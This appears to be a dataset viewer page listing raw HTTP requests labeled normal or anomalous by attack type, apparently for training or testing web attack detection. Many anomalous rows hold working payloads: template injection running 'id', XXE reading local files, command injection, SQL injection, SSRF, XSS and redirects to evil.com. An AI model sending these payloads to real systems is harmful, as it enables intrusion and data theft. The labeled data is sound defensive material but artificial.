Dataset Viewer
Auto-converted to Parquet Duplicate
raw-request
stringlengths
31
82.8k
label
stringclasses
2 values
attack_type
stringclasses
17 values
GET /vulnerabilities/sqli/?id=${1+2}|e HTTP/1.1 User-Agent: Mozilla/5.0 (iPad; CPU OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, deflate Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5 Accept-Language: en Cookie: JSESSIONID=1A5B78090C7FB50FD7F76C8A3C841AE3 Host: localhost Connection: close
anomalous
Server_Side_Template_Injection
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/120.0.0.0 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, deflate Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5 Accept-Language: en Cookie: JSESSIONID=7BAC5CEC38CB255AFB4C10DA86121AA4 Host: localhost Content-Type: application/xml Connection: close Content-Length: 96 <?xml version="1.0" encoding="UTF-8"?> <user> <id>x-from</id> <name>admin</name> </user>
anomalous
Web_Cache_Deception
GET /?mou=5647 HTTP/1.1 Host: localhost:3000 User-Agent: PostmanRuntime/7.26.8 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 20535874-f7b3-428d-bebb-eed684c6db26
normal
none
GET /vulnerabilities/sqli/?id=1&nad=0207 HTTP/1.1 User-Agent: <div style="position:fixed;top:0;left:0;width:100%;height:100%;background:linear-gradient(45deg,red,black);color:lime;font-size:100px;display:flex;align-items:center;justify-content:center;z-index:999999;">PWNED</div> Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, deflate Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5 Accept-Language: en Cookie: JSESSIONID=2A5F5EB03771E7C8AE019CFBCA162998 Host: localhost Connection: close
anomalous
HTML_Injection
GET /vulnerabilities/sqli/?id=1&elc=3121 HTTP/1.1 User-Agent: ${eval(`{php}echo `id`;{/php}`)} Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, deflate Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5 Accept-Language: en Cookie: JSESSIONID=910217416037255B4C4668C3CF07CE2A Host: localhost Connection: close
anomalous
Server_Side_Template_Injection
GET /?lyo=1339 HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: a267691f-bd04-4723-ac6a-25a07c1a2bd9
normal
none
GET /?qrg=6622&path=/usr/local/bin HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: c304edf9-c16a-4d9d-a7c7-2461319d8c6e
normal
none
GET /?mqy=6322 HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 06cf2333-5b9b-4903-8ed0-42529508888c &extra_info=text=../../etc/passwd
normal
none
GET /vulnerabilities/sqli/?id=file://localhost:3306/ HTTP/1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, deflate Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5 Accept-Language: en Cookie: JSESSIONID=932759E9E231D0B9F0FF092FE552C1FB Host: localhost Connection: close
anomalous
Server_Side_Request_Forgery
GET /realms/master/protocol/openid-connect/auth?client_id=account&redirect_uri=https://127.0.0.1:80@oast.me HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Accept-Encoding: gzip Connection: close
anomalous
Advanced_Vulnerability_Scan
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/120.0.0.0 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, deflate Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5 Accept-Language: en Cookie: JSESSIONID=1A149FACAE9E7D32DE2CA4286C73E48E Host: localhost Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 49 id=http%3A//%40%5B%3A%3A1%5D%3A9001&submit=Submit
anomalous
Server_Side_Request_Forgery
GET /vulnerabilities/sqli/?id=1&ccr=6299 HTTP/1.1 User-Agent: //%09evil.com Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, deflate Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5 Accept-Language: en Cookie: JSESSIONID=56C07738D0F9A751314B342B16D8E375 Host: localhost Connection: close
anomalous
Open_Redirect
GET /?ref=85f8df27-0105-4c59-8b19-5286150be000&session_token=7256 HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 85f8df27-0105-4c59-8b19-5286150be000 value=alert(1)
normal
none
GET /?vun=8595&query=drop+table HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: c8be017b-7086-4e71-bdf5-bee32311e951
normal
none
GET /?tde=3750 HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 589b0cfe-3d93-41a8-85a6-1896e4feb986
normal
none
POST /api/v1/session HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Connection: close Content-Length: 52 Content-Type: application/json Accept-Encoding: gzip {"username":"admin","password":"admin321","code":""}
anomalous
Advanced_Vulnerability_Scan
GET /?tsw=4842 HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 6b33e191-797e-44c7-a79d-56f930a86edf
normal
none
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/120.0.0.0 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, deflate Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5 Accept-Language: en Cookie: JSESSIONID=BEE17435ADCBDBE5D2C6C8A81DB4D984 Host: localhost Content-Type: application/xml Connection: close Content-Length: 207 <?xml version="1.0" encoding="UTF-8"?> <user> <id><!DOCTYPE payload [<!ENTITY payload php://filter/convert.base64-encode/resource="C:/Windows/Panther/Unattend.xml"> ]></id> <name>admin</name> </user>
anomalous
XML_External_Entity
GET /rest/products/search?q=apple&cache_id=708992b6-67e4-4cea-b092-a6ddb165b720&desc=admin's+profile HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 708992b6-67e4-4cea-b092-a6ddb165b720
normal
none
GET /rest/products/search?q=juice&cache_id=1527b2c0-14a2-4e3e-9d57-aab512b73e74 HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 1527b2c0-14a2-4e3e-9d57-aab512b73e74
normal
none
GET /rest/products/search?q=shirt&cache_id=c544042e-2379-4cd0-9be6-7b5b680fcfe3 HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: c544042e-2379-4cd0-9be6-7b5b680fcfe3
normal
none
GET /?hio=6459 HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: f34503d3-41ae-4d7e-bf3e-f733e1a6d6e2 &extra_info=query=drop+table
normal
none
GET /?csy=3408 HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 8c0556dd-6830-4b2c-ac97-603cae3b25bd &extra_info=data=%3Cscript%3E
normal
none
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (iPad; CPU OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, deflate Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5 Accept-Language: en Cookie: JSESSIONID=10FBAEA8A6347F0492D00290DDCF167D Host: localhost Content-Type: application/xml Connection: close Content-Length: 119 <?xml version="1.0" encoding="UTF-8"?> <user> <id>https://;127.127.127.127:5000</id> <name>admin</name> </user>
anomalous
Server_Side_Request_Forgery
GET /rest/products/search?q=shirt&cache_id=f3acb125-5465-4e02-abba-9aac68bd0053 HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: f3acb125-5465-4e02-abba-9aac68bd0053 q=select+*+from+users
normal
none
GET /vulnerabilities/sqli/?id=${&rpo=3182 config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]('id').read() }} HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, deflate Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5 Accept-Language: en Cookie: JSESSIONID=78A1A21825992C2E74129C3470855B46 Host: localhost Connection: close
anomalous
Server_Side_Template_Injection
GET /?kvu=9310&cmd=ping+127.0.0.1 HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 2560acbf-ee8d-4fac-9fec-80957afb6dc6
normal
none
GET /?apc=0227 HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 573d854f-0e7a-441c-b552-717a8f1c77e6 &extra_info=path=/usr/local/bin
normal
none
GET /?idn=9386 HTTP/1.1 Host: localhost:3000 User-Agent: PostmanRuntime/7.26.8 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 08bf0e79-20e6-4f36-83ea-9330aae8b13b
normal
none
GET /?rwn=9561&desc=admin's+profile HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 706e2a2d-edb7-4cb4-8540-47a8d726bfe3
normal
none
GET /rest/products/search?q=%20%0aYUI=%24%28echo%20JGJRTX%29%0aYUI1=%24%7B%23YUI%7D%0aif%20%5B%203%20-eq%20%24YUI1%20%5D%0athen%20sleep%201%0afi%27 HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: commix/v4.2.dev1 (https://commixproject.com) Referer: http://localhost:3000/rest/products/search Host: localhost:3000 Accept: */* Accept-Encoding: gzip, deflate Connection: close
anomalous
Command_Injection
GET /?nbt=7289 HTTP/1.1 Host: localhost:3000 User-Agent: curl/7.68.0 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 3c81fb43-facb-43f7-9f96-7fd0f8bd665f
normal
none
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, deflate Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5 Accept-Language: en Cookie: JSESSIONID=AA5B6A4D985703786E68804C309F01F6 Host: localhost Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 325 id=%3Cimg%20src%3D%22/transfer%40%3F%3Cinput%20type%3D%22hidden%22%20name%3D%22recipient%22%20value%3D%22password123%20%22%3E%3Cinput%20type%3D%22hidden%22%20name%3D%22amount%22%20value%3D%22root%22%3E%3Cinput%20type%3D%22hidden%22%20name%3D%22destination%22%20value%3D%22admin%40evil.comvbscript%3A%22%3E%22%3E&submit=Submit
anomalous
Cross_Site_Request_Forgery
GET /vulnerabilities/sqli/?id=1&bxx=9304 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, deflate Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5 Accept-Language: en Cookie: JSESSIONID=B1C0EE30C1EC3347429EB0A73ABBE60D Referer: http://malicious.com/'"<noscript src=x onmousemove=alert%281%29>"' Host: localhost Connection: close
anomalous
Cross_Site_Scripting
GET /?huu=1996 HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: f7e47bcb-e6f8-45ba-a5b4-a4eb9e59c881
normal
none
GET /?rkz=1189&id=1 OR 1=1 HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: db4bed7d-999d-4419-83e5-1ec2372febe5
normal
none
GET /rest/products/search?q=glass&cache_id=a55ea436-7890-40f9-ac16-3e62dfc426ed HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 14_0 like Mac OS X) AppleWebKit/605.1.15 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: a55ea436-7890-40f9-ac16-3e62dfc426ed
normal
none
GET /?qfd=9290 HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 538666c6-3af9-47fd-871f-f55e9f5fc7c6
normal
none
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, deflate Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5 Accept-Language: en Cookie: JSESSIONID=97E2A8345198495586278A4900CB0E6F Host: localhost Content-Type: application/json Connection: close Content-Length: 38 {"id": "**))|(*)", "action": "search"}
anomalous
LDAP_Injection
GET /vulnerabilities/sqli/?id=1&bal=5012 HTTP/1.1 User-Agent: *)&(%29 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, deflate Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5 Accept-Language: en Cookie: JSESSIONID=DE5C293B14CEF6F553F10822534D316B Host: localhost Connection: close
anomalous
LDAP_Injection
GET /rest/products/search?q=%28%2F%2A%21%53%45%6C%45%43%74%2A%2F%28%2F%2A%21%63%61%73%45%2A%2F%2F%2A%21%77%68%45%4E%2A%2F%28%36%38%34%31%3D%38%33%30%36%29%2F%2A%21%54%68%45%6E%2A%2F%36%38%34%31%2F%2A%21%45%4C%53%65%2A%2F%43%61%53%74%28%31%2F%2A%21%41%73%2A%2F%2F%2A%21%69%4E%54%2A%2F%29%2F%28%2F%2A%21%53%45%6C%45%43%74%2A%2F%30%2F%2A%21%66%72%4F%6D%2A%2F%2F%2A%21%44%55%41%6C%2A%2F%29%2F%2A%21%65%4E%44%2A%2F%29%2F%2A%21%66%72%4F%6D%2A%2F%2F%2A%21%44%55%41%6C%2A%2F%29 HTTP/1.1 Cache-Control: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0 Referer: http://localhost:3000/rest/products/search Host: localhost:3000 Accept: */* Accept-Encoding: gzip,deflate Connection: close
anomalous
SQL_Injection
POST /v1/graphql/console?amr=2834 HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0 Content-Length: 67 Accept: */* Accept-Language: en Content-Type: application/json Accept-Encoding: gzip Connection: close {"query":"query IntrospectionQuery{__schema {queryType { name }}}"}
anomalous
Advanced_Vulnerability_Scan
GET /rest/products/search?q=premium&cache_id=8ea14582-a95e-48ee-8f89-91c1da8d017d&file=../../images/logo.png HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 8ea14582-a95e-48ee-8f89-91c1da8d017d
normal
none
GET /rest/products/search?q=sale&cache_id=7aa4fdf1-88c5-4484-86d5-603a33c2e473 HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 7aa4fdf1-88c5-4484-86d5-603a33c2e473
normal
none
GET /?wig=1445 HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 18ef4128-8307-4af0-b46a-948abbe8b9bb
normal
none
GET /vulnerabilities/sqli/?id=1&mrk=6715 HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, deflate Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5 Accept-Language: en Cookie: JSESSIONID=C77EE404D745FC8FBC6F7C32D1AFB740 Referer: http://malicious.com/"<script>parent.alert%281%29</script>" Host: localhost Connection: close
anomalous
Cross_Site_Scripting
GET /rest/products/search?q=<h6>your site has been compromised HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/120.0.0.0 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, deflate Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5 Accept-Language: en Cookie: JSESSIONID=8ED1804FA4E6A818A0743CB3946424C2 Host: localhost:3000 Connection: close
anomalous
HTML_Injection
POST /vulnerabilities/sqli/ HTTP/1.1 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, deflate Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5 Accept-Language: en Cookie: JSESSIONID=F885AA397E19721A3BBD2E173C3685A0 Host: localhost Content-Type: application/xml Connection: close Content-Length: 196 <?xml version="1.0" encoding="UTF-8"?> <user> <id><meta http-equiv="refresh" content="0;url=/payment/submit?<input type="hidden" name="currency" value="root</id> <name>admin</name> </user>
anomalous
Cross_Site_Request_Forgery
GET /?ddo=6602 HTTP/1.1 Host: localhost:3000 User-Agent: curl/7.68.0 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 5ab9f7e4-708b-420a-89e6-5fff2ad71a14
normal
none
GET /?bsm=3693 HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 98e74f45-f618-4a39-8c6a-89d83a537e89
normal
none
GET /rest/products/search?q=%20%7Cecho%20WKIFUF%24%28%2814%2B67%29%29%24%28echo%20WKIFUF%29WKIFUF%3B HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: commix/v4.2.dev1 (https://commixproject.com) Referer: http://localhost:3000/rest/products/search Host: localhost:3000 Accept: */* Accept-Encoding: gzip, deflate Connection: close
anomalous
Command_Injection
GET /?lgq=7662&math=1<2 HTTP/1.1 Host: localhost:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: */* Connection: keep-alive X-Request-ID: 6353e90b-7082-44ef-9cff-1f2daabd6870
normal
none
GET /vulnerabilities/sqli/?id=ldap://127.1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, deflate Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5 Accept-Language: en Cookie: JSESSIONID=7E7FA62DC0CC1A39C9626BDE9DAB66C4 Host: localhost Connection: close
anomalous
Server_Side_Request_Forgery
GET /vulnerabilities/sqli/?id=1&yoq=6144 HTTP/1.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, deflate Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5 Accept-Language: en Cookie: JSESSIONID=1CC9302D679E81D7DB3C0782F2696452 Referer: http://malicious.com//../evil.com Host: localhost Connection: close
anomalous
Open_Redirect
GET /vulnerabilities/sqli/?id=<bIg>sEcUrItY ReSeArCh dEmO HTTP/1.1 User-Agent: Mozilla/5.0 (iPad; CPU OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, deflate Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5 Accept-Language: en Cookie: JSESSIONID=BB4BBA36F097C009316FE55EAD17C7C0 Host: localhost Connection: close
anomalous
HTML_Injection
GET /rest/products/search?q=gopher://127.0.0.1:8080 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/120.0.0.0 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, deflate Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5 Accept-Language: en Cookie: JSESSIONID=C2A57BFBC29D6CCAE8A0CBA8750BBEA3 Host: localhost:3000 Connection: close
anomalous
Server_Side_Request_Forgery
GET /vulnerabilities/sqli/?id=1&eaw=5648 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Pragma: no-cache Cache-Control: no-cache Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: x-gzip, x-deflate, gzip, deflate Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5 Accept-Language: en Cookie: JSESSIONID=34DCA0417AA4A3A04D8840D81D019431 Referer: http://malicious.com/<?xml version="1.0" encoding="windows-1252"?><!DOCTYPE root [<!ENTITY s1 SYSTEM "file:///proc/net/tcp"> ]><data>&s1;</data> Host: localhost Connection: close
anomalous
XML_External_Entity
